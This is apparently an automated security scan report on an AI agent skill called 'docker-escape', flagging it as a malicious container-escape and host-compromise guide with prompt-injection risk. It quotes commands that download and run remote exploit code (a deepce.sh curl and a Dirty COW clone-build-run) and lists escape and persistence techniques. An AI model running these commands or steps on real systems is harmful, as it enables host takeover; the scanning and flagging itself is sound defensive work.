docker-escape

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit, comprehensive malicious guide for Docker container escape and host compromise—detailing remote code execution (reverse shells), credential exfiltration, privilege escalation, creating privileged containers via docker.sock/Remote API, overwriting core_pattern, writing SSH keys/crontabs for persistence, and exploiting multiple CVEs.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's workflow explicitly instructs fetching and executing public, untrusted third-party content (e.g., git clone and curl raw GitHub URLs and external links shown in references/escape-methods.md and SKILL.md such as "git clone https://github.com/..." and "curl -sL https://github.com/.../deepce.sh"), which the agent would read/run as part of its exploitation steps and could thus introduce indirect prompt-injection.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill includes explicit runtime fetch-and-execute commands that pull remote exploit code (e.g., curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o /tmp/deepce.sh and git clone https://github.com/gbonacini/CVE-2016-5195 && make && ./dcow), so these URLs are used at runtime to obtain and run remote code.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt provides explicit, step-by-step instructions and commands to escape Docker containers and modify host state (mount host filesystems, create privileged containers, write to /etc or cron, change core_pattern, use docker.sock/remote API), which directly instructs actions that require elevated privileges and compromise the machine.